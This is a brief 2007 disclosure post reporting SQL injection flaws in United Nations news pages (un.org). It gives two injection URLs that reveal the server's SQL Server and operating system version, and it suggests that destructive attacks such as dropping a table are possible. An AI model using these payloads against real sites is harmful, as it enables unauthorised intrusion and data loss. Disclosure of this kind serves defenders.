unorg-sql.txt
Posted on 28 February 2007
un.org SQL Injection vulnerabilities ------------------------------------ by s0cratex I found a small vulnerability in un.org website... The bug is type SQL Injection: http://www.un.org/spanish/News/fullstorynews.asp?NewsID=7702 AND 1 IN (SELECT @@version)-- or http://www.un.org/chinese/News/fullstorynews.asp?NewsID=8000 AND 1 IN (SELECT @@version)-- In the example, you can view the version of your Operative System and SQL Server... Other attacks can be possible, for examplo a drop table. Remember that is the "United Nations" Server...xD s0cratex@hotmail.com Nicaragua Exist... plexinium.com Comming soon _________________________________________________________________ MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/